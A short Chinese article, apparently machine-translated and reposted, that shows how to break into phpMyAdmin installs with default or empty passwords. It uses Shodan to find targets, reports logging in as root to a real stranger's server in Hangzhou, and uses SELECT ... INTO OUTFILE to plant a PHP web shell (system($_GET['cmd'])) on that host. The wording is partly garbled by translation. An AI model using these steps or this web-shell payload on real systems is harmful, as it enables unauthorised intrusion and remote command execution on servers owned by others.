手机版

phpMyAdmin通过密码漏洞留下后门文件

时间:2021-08-28 来源:互联网 编辑:宝哥软件园 浏览:

默认phpMyAdmin:用户名根密码根或空登录。版本2.11.3 ~ 2.11.4:用户名“localhost”@“@”登录时没有密码。版本2.11.9.2:用户名root登录,不需要密码。经过测试,第二个漏洞在phpmyadmin 3 . 5 . 1版本中也是可行的。原理省略。

我们干脆上网看看能不能找到一些有这样漏洞的登陆页面。

牺牲著名的漏洞搜索引擎Shodan,搜索phpMyAdmin。

使用

先看看有没有不需要密码就能登录的人,然后试着一个一个找到名字里包含的版本号。在这里我找到一个国内的(浙江省杭州市)。

地址已被人工编码。

http://121.***.* . 219:80/

登录成功(根权限)。

接下来,您可以将一个输出文件写入另一台主机的网络目录。俗称“走后门”。

选择?php系统($ _ GET[' cmd ']);'进入outfile“后门文件的绝对路径”被点击运行,一个名为runme.php的后门文件毫无意外地留在了另一台主机上。

摘要

以上就是本文的全部内容。希望本文的内容对大家的学习或工作有一定的参考价值。谢谢你的支持。如果你想了解更多,请查看下面的相关链接

版权声明:phpMyAdmin通过密码漏洞留下后门文件是由宝哥软件园云端程序自动收集整理而来。如果本文侵犯了你的权益,请联系本站底部QQ或者邮箱删除。

相关文章推荐